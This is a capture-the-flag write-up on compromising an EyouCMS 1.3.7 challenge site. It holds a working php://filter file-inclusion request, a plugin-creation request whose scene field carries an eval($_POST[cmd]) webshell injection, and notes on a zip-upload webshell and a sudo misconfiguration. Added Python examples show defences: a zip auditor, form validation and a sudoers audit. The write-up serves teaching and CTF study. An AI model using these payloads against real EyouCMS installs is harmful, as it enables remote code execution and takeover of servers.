(゚Д゚)[゚ε゚]+(゚Θ゚)+ ((o^_^o) +(o^_^o))+ (o^_^o)+ (゚Д゚)[゚ε゚]+(゚ー゚)+ (c^_^o)+ (゚Д゚)[゚ε゚]+((゚ー゚) + (゚Θ゚))+ ((゚ー゚) + (゚Θ゚))+ (゚Д゚)[゚ε゚]+((゚ー゚) + (゚Θ゚))+ ((o^_^o) +(o^_^o))+ (゚Д゚)[゚ε゚]+((゚ー゚) + (゚Θ゚))+ ((o^_^o) +(o^_^o))+ (゚Д゚)[゚ε゚]+((゚ー゚) + (゚Θ゚))+ ((o^_^o) +(o^_^o))+ (゚Д゚)[゚ε゚]+((゚ー゚) + (゚Θ゚))+ ((゚ー゚) + (o^_^o))+ (゚Д゚)[゚ε゚]+((゚ー゚) + (゚Θ゚))+ ((゚ー゚) + (゚Θ゚))+ (゚Д゚)[゚ε゚]+((゚ー゚) + (゚Θ゚))+ ((゚ー゚) + (゚Θ゚))+ (゚Д゚)[゚ε゚]+((゚ー゚) + (゚Θ゚))+ ((゚ー゚) + (o^_^o))+ (゚Д゚)[゚ε゚]+((゚ー゚) + (゚Θ゚))+ ((゚ー゚) + (゚Θ゚))+ (゚Д゚)[゚ε゚]+((゚ー゚) + (゚Θ゚))+ ((゚ー゚) + (゚Θ゚))+ (゚Д゚)[゚ε゚]+((゚ー゚) + (゚Θ゚))+ ((o^_^o) +(o^_^o))+ (゚Д゚)[゚ε゚]+((゚ー゚) + (゚Θ゚))+ ((o^_^o) +(o^_^o))+ (゚Д゚)[゚ε゚]+((゚ー゚) + (゚Θ゚))+ ((゚ー゚) + (o^_^o))+ (゚Д゚)[゚ε゚]+((゚ー゚) + (゚Θ゚))+ ((o^_^o) +(o^_^o))+ (゚Д゚)[゚ε゚]+((゚ー゚) + (゚Θ゚))+ ((゚ー゚) + (゚Θ゚))+ (゚Д゚)[゚ε゚]+((゚ー゚) + (゚Θ゚))+ ((゚ー゚) + (o^_^o))+ (゚Д゚)[゚ε゚]+((゚ー゚) + (゚Θ゚))+ ((゚ー゚) + (゚Θ゚))+ (゚Д゚)[゚ε゚]+((゚ー゚) + (゚Θ゚))+ ((o^_^o) +(o^_^o))+ (゚Д゚)[゚ε゚]+((゚ー゚) + (゚Θ゚))+ ((o^_^o) +(o^_^o))+ (゚Д゚)[゚ε゚]+((゚ー゚) + (゚Θ゚))+ ((゚ー゚) + 
(o^_^o))+ (゚Д゚)[゚ε゚]+((゚ー゚) + (゚Θ゚))+ ((゚ー゚) + (゚Θ゚))+ (゚Д゚)[゚ε゚]+((゚ー゚) + (゚Θ゚))+ ((゚ー゚) + (゚Θ゚))+ (゚Д゚)[゚ε゚]+((゚ー゚) + (゚Θ゚))+ ((゚ー゚) + (o^_^o))+ (゚Д゚)[゚ε゚]+((゚ー゚) + (゚Θ゚))+ ((o^_^o) +(o^_^o))+ (゚Д゚)[゚ε゚]+((゚ー゚) + (゚Θ゚))+ ((o^_^o) +(o^_^o))+ (゚Д゚)[゚ε゚]+((゚ー゚) + (゚Θ゚))+ ((゚ー゚) + (o^_^o))+ (゚Д゚)[゚ε゚]+((゚ー゚) + (゚Θ゚))+ ((゚ー゚) + (゚Θ゚))+ (゚Д゚)[゚ε゚]+((゚ー゚) + (゚Θ゚))+ ((o^_^o) +(o^_^o))+ (゚Д゚)[゚ε゚]+(゚ー゚)+ ((o^_^o) - (゚Θ゚))+ (゚Д゚)[゚ε゚]+((゚ー゚) + (゚Θ゚))+ (゚Θ゚)+ (゚Д゚)[゚o゚]) (゚Θ゚)) ('_');
```

Decoding the kaomoji (aaencode) JavaScript gives

```js
alert("Challenger, the background of the website is -.../--/--../.-/-../--/../-.");
```

Decoding the Morse code gives

```text
bmzadmin
```

Use the file inclusion to read bmzadmin.php

```http
POST /?lang=php://filter/convert.base64-encode/resource=bmzadmin HTTP/1.1
Host: www.bmzclub.cn:21490
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.104 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: session=ca99f077-3758-40ca-802a-0b8afbf5b9e7; Hm_lvt_d7a3b863d5a302676afbe86b11339abd=1612590588,1612590698; Hm_lpvt_d7a3b863d5a302676afbe86b11339abd=1612590698; PHPSESSID=r8hvjhmrvbjjcp8sbov7pmm2p0
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 18
```


This gives the contents of bmzadmin.php

```php
<?php

header("Content-type:text/html;charset=utf-8");
// [ application entry file ]
if (extension_loaded('zlib')){
try{
ob_end_clean();
} catch(Exception $e) {

}
ob_start('ob_gzhandler');
}
// Check the PHP environment
if(version_compare(PHP_VERSION,'5.4.0','<')) die('本系统要求PHP版本 >= 5.4.0,当前PHP版本为:'.PHP_VERSION . ',请到虚拟主机控制面板里切换PHP版本,或联系空间商协助切换。<a href="http://www.eyoucms.com/help/" target="_blank">点击查看易优安装教程</a>');
// error_reporting(E_ALL ^ E_NOTICE);// show all errors except E_NOTICE
error_reporting(E_ERROR | E_WARNING | E_PARSE);// report runtime errors

// Check whether EyouCMS is already installed
if(file_exists("./install/") && !file_exists("./install/install.lock")){
header('Location:./install/index.php');
exit();
}

// Bind the current request to the admin module
define('BIND_MODULE','admin');
// Cache lifetime
define('EYOUCMS_CACHE_TIME', 86400);
// Absolute data path
define('DATA_PATH', __DIR__ . '/data/');
// Runtime cache
define('RUNTIME_PATH', DATA_PATH . 'runtime/');
// Installer definitions
define('DEFAULT_INSTALL_DATE',1525756440);
// Serial number
define('DEFAULT_SERIALNUMBER','20180508131400oCWIoa');
// Define the application directory
define('APP_PATH', __DIR__ . '/application/');
// Load the framework bootstrap file
require __DIR__ . '/core/start.php';
```

This is EyouCMS. Visiting bmzadmin.php shows a login page.

Brute-forcing it got nowhere. Reading on in the writeup, it turned out to be the password seen earlier in index.php, which I had forgotten about by this point...

Neither admin nor bmzadmin works as the username, but the home page source contains

```html
<p>Power by<a href="#">@kuaile</a></p>
```

Trying the username kuaile logs in successfully, and the EyouCMS version is 1.3.7.

Searching the 零组文库 library for EyouCMS vulnerabilities turns up a file upload vulnerability in the plugin module in versions before 1.3.9.

Reproduce it following the steps from the library:

The upload() method in Weapp.php accepts a zip file upload and automatically extracts it into a folder whose name is a random md5 value.

Enable the plugin feature in the admin panel and upload a zip containing a PHP one-liner webshell and an arbitrary image (the image content does not matter, any normal image works, but it must be present).

After uploading, an error message is returned, but the backend has actually already extracted the zip.

Go to the content management module, pick any product to edit; in the image gallery section you can upload images. Choose online management and the folder name is visible on the left.

Then simply access the PHP webshell file in that folder.

In online management, however, the folder name mentioned in the vulnerability details does not exist.

Back to the writeup: it says the challenge environment may have restricted this, but there is another vulnerability that gives a shell.

Go to Plugin Applications - Plugin Developer, fill in the required information, then intercept with Burp Suite: click Initialize Structure, forward the first request, intercept the second one and send it to Repeater.
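For the defender's side of the plugin-upload bug described above, here is an added Python example (not EyouCMS code) that audits a zip before it is extracted into a web-reachable directory: it rejects traversal and absolute paths, symlink entries, server-executable extensions anywhere in a file name (including image.php.jpg double extensions) and crude zip bombs. The allowed-extension list, the executable-extension list, the size limits and the in-memory sample archives are all constructed for the example.

```python
import io
import posixpath
import stat
import zipfile
from typing import List, Tuple

# What an image/asset upload directory is allowed to contain (assumption).
ALLOWED_EXT = {".png", ".jpg", ".jpeg", ".gif", ".webp", ".txt", ".json"}
# Extensions a web server may execute; they must not appear anywhere in a
# name, including as a middle extension such as image.php.jpg (assumption).
EXECUTABLE = {"php", "php3", "php4", "php5", "php7", "phtml", "phar", "pht", "shtml", "cgi"}
MAX_ENTRIES = 200
MAX_TOTAL_BYTES = 20 * 1024 * 1024
MAX_RATIO = 100  # uncompressed/compressed; a crude zip-bomb guard


def audit_zip(data: bytes) -> List[str]:
    """Return a list of problems; an empty list means the archive may be extracted."""
    problems: List[str] = []
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile as exc:
        return [f"not a zip archive: {exc}"]
    with zf:
        infos = zf.infolist()
        if len(infos) > MAX_ENTRIES:
            problems.append(f"too many entries ({len(infos)} > {MAX_ENTRIES})")
        total = 0
        for info in infos:
            name = info.filename
            # Path safety: no absolute paths, no traversal, no backslash tricks.
            if name.startswith("/") or "\\" in name or posixpath.normpath(name).startswith(".."):
                problems.append(f"{name}: path escapes the target directory")
            # A symlink entry would let a later entry write through the link.
            if stat.S_ISLNK(info.external_attr >> 16):
                problems.append(f"{name}: symlink entries are not allowed")
            if info.is_dir():
                continue
            base = posixpath.basename(name).lower()
            parts = base.split(".")
            ext = "." + parts[-1] if len(parts) > 1 else ""
            if base.startswith(".") or ext not in ALLOWED_EXT:
                problems.append(f"{name}: file type not allowed")
            elif any(p in EXECUTABLE for p in parts[1:-1]):
                problems.append(f"{name}: executable extension hidden before {ext}")
            total += info.file_size
            if info.compress_size and info.file_size / info.compress_size > MAX_RATIO:
                problems.append(f"{name}: compression ratio too high")
        if total > MAX_TOTAL_BYTES:
            problems.append(f"total uncompressed size {total} exceeds limit")
    return problems


def build_zip(entries: List[Tuple[str, bytes]]) -> bytes:
    """Helper to construct in-memory archives for the example."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, content in entries:
            zf.writestr(name, content)
    return buf.getvalue()


# Constructed samples: a legitimate image upload and one shaped like the
# plugin-upload abuse described above (bodies are harmless placeholders).
CLEAN_ZIP = build_zip([
    ("cover.jpg", b"\xff\xd8\xff\xe0 constructed jpeg placeholder"),
    ("notes.txt", b"release notes"),
])
BAD_ZIP = build_zip([
    ("photo.jpg", b"\xff\xd8\xff\xe0 constructed jpeg placeholder"),
    ("shell.php", b"<?php echo 'placeholder'; ?>"),
    ("image.php.jpg", b"not really an image"),
    ("../../outside.jpg", b"traversal attempt"),
])

if __name__ == "__main__":
    print("clean:", audit_zip(CLEAN_ZIP))
    print("bad:", *audit_zip(BAD_ZIP), sep="\n  ")
```

Checking the archive listing is only half of it: the extraction target itself should live outside the document root, or be served with script execution disabled, so that an entry that slips past the audit still cannot run.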

```http
POST /bmzadmin.php?m=admin&c=Weapp&a=create&lang=cn HTTP/1.1
Host: www.bmzclub.cn:21490
Content-Length: 94
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://www.bmzclub.cn:21490
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.104 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://www.bmzclub.cn:21490/bmzadmin.php?m=admin&c=Weapp&a=create&lang=cn
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: session=ca99f077-3758-40ca-802a-0b8afbf5b9e7; PHPSESSID=r8hvjhmrvbjjcp8sbov7pmm2p0; Hm_lvt_d7a3b863d5a302676afbe86b11339abd=1612590588,1612590698,1612599669; admin_lang=cn; home_lang=cn; Hm_lpvt_d7a3b863d5a302676afbe86b11339abd=1612600412; ENV_GOBACK_URL=%2Fbmzadmin.php%3Fm%3Dadmin%26c%3DArchives%26a%3Dindex_archives%26lang%3Dcn; ENV_LIST_URL=%2Fbmzadmin.php%3Fm%3Dadmin%26c%3DArchives%26a%3Dindex_archives%26lang%3Dcn; ENV_IS_UPHTML=0; workspaceParam=index%7CWeapp
Connection: close

code=Shell&name=shell&version=v1.0.0&min_version=v1.3.7&author=shell&scene=0&description=shell
```

Change scene=0 to scene=bbb\',${eval($_POST[cmd])},// and send.

Verify the shell.

Connect with AntSword. There is no flag in the web root; /root contains the flag, but reading it directly fails for lack of permissions.

Open a terminal; sudo -l shows that the current user www-data can run any command as root, with no password required.

Read the flag directly.
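The injected scene value breaks out of a quoted string and relies on PHP interpolating ${...}, which PHP does only inside double-quoted strings and heredocs. This added Python example (not EyouCMS code) shows the two controls that stop it: a strict per-field schema applied to the form body before anything is stored, and generating the plugin config from single-quoted, escaped PHP literals, where ${...} is inert text. The field rules and the generated-file layout are assumptions made for the example; the two request bodies are the ones shown above.

```python
import re
from typing import Dict, List, Tuple
from urllib.parse import parse_qs

# One strict pattern per form field (assumption: these are the fields the
# captured request submits; the patterns themselves are this example's choice).
FIELD_RULES = {
    "code": re.compile(r"[A-Za-z][A-Za-z0-9_]{0,31}"),
    "name": re.compile(r"[A-Za-z0-9 ._\-]{1,64}"),
    "version": re.compile(r"v?\d+(?:\.\d+){0,3}"),
    "min_version": re.compile(r"v?\d+(?:\.\d+){0,3}"),
    "author": re.compile(r"[A-Za-z0-9 ._\-@]{1,64}"),
    "scene": re.compile(r"\d{1,3}"),
    # free text, but no control chars, quotes, backslashes, $ or <>
    "description": re.compile(r"[^\x00-\x1f\x7f<>$`\\'\"]{0,255}"),
}


def validate_plugin_form(body: str) -> Tuple[Dict[str, str], List[str]]:
    """Parse an x-www-form-urlencoded body and check every field against its rule."""
    fields = {k: v[-1] for k, v in parse_qs(body, keep_blank_values=True).items()}
    errors: List[str] = []
    for name, rule in FIELD_RULES.items():
        if name not in fields:
            errors.append(f"{name}: missing")
        elif not rule.fullmatch(fields[name]):
            errors.append(f"{name}: rejected value {fields[name]!r}")
    for name in fields:
        if name not in FIELD_RULES:
            errors.append(f"{name}: unexpected field")
    return fields, errors


def php_single_quoted(value: str) -> str:
    """Render value as a PHP single-quoted literal. Only backslash and the
    quote need escaping, and PHP never interpolates $var or ${...} inside
    single quotes, so a value like bbb\\',${...} stays plain text."""
    return "'" + value.replace("\\", "\\\\").replace("'", "\\'") + "'"


def render_plugin_config(fields: Dict[str, str]) -> str:
    """Emit the generated config as PHP source built only from escaped literals."""
    lines = ["<?php", "return ["]
    for key, value in fields.items():
        lines.append(f"    {php_single_quoted(key)} => {php_single_quoted(value)},")
    lines.append("];")
    return "\n".join(lines)


# The form body from the captured request, and the modified one from the
# writeup's final step.
ORIGINAL_BODY = "code=Shell&name=shell&version=v1.0.0&min_version=v1.3.7&author=shell&scene=0&description=shell"
INJECTED_BODY = ORIGINAL_BODY.replace("scene=0", "scene=bbb\\',${eval($_POST[cmd])},//")

if __name__ == "__main__":
    for body in (ORIGINAL_BODY, INJECTED_BODY):
        fields, errors = validate_plugin_form(body)
        print("errors:", errors or "none")
        if not errors:
            print(render_plugin_config(fields))
```

Validation is the control that rejects the request; the single-quoted rendering is defence in depth for the case where a future field is added without a rule.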
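The sudo -l result above is a textbook misconfiguration: a web-server service account holding passwordless root. As an added Python example (not from the writeup), here is a small sudoers auditor that parses user specifications and flags such rules, rating a service account with root ALL as critical and any other passwordless root ALL as high. The service-account list and the sample sudoers content are constructed for the example.

```python
import re
from typing import Dict, List

# Accounts that run network-facing services; none should hold sudo rights at
# all, let alone passwordless root (assumption for this example).
SERVICE_ACCOUNTS = {"www-data", "apache", "nginx", "httpd", "php-fpm", "mysql", "postgres", "nobody"}

# Directives that are not user specifications and must be skipped.
NON_RULES = ("Defaults", "User_Alias", "Cmnd_Alias", "Host_Alias", "Runas_Alias", "@include")

# user host=(runas) TAG: commands   (aliases and command lists kept simple)
RULE_RE = re.compile(
    r"^(?P<user>[^\s=]+)\s+(?P<host>[^\s=]+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z_]+:\s*)*)"
    r"(?P<cmds>.+)$"
)


def audit_sudoers(text: str) -> List[Dict[str, str]]:
    """Return one finding per risky user specification, in file order."""
    findings: List[Dict[str, str]] = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#") or line.startswith(NON_RULES):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        user = m.group("user")
        runas = (m.group("runas") or "root").split(":")[0].strip()  # default runas is root
        cmds = m.group("cmds").strip()
        as_root = runas in ("ALL", "root")
        all_cmds = cmds == "ALL"
        nopasswd = "NOPASSWD" in m.group("tags")
        severity = None
        if user in SERVICE_ACCOUNTS:
            severity = "critical" if as_root and (all_cmds or nopasswd) else "medium"
        elif as_root and all_cmds and nopasswd:
            severity = "high"
        if severity:
            findings.append({
                "line": str(lineno), "user": user, "runas": runas, "cmds": cmds,
                "nopasswd": str(nopasswd), "severity": severity,
            })
    return findings


# Constructed sample sudoers: two normal rules, one scoped NOPASSWD rule, and
# two broad ones, the last mirroring what sudo -l showed for www-data above.
SAMPLE_SUDOERS = """\
# constructed sample /etc/sudoers for the example
Defaults        env_reset
Defaults        secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
deploy  ALL=(root) NOPASSWD: /usr/bin/systemctl restart app
backup  ALL=(ALL) NOPASSWD: ALL
www-data ALL=(ALL) NOPASSWD: ALL
"""

if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE_SUDOERS):
        print(f"line {f['line']}: {f['severity']:8} {f['user']} -> ({f['runas']}) {f['cmds']} nopasswd={f['nopasswd']}")
```

Run it over /etc/sudoers and every file in /etc/sudoers.d as part of host hardening checks; the deploy rule shows the shape a legitimate exception should take, a single fixed command rather than ALL.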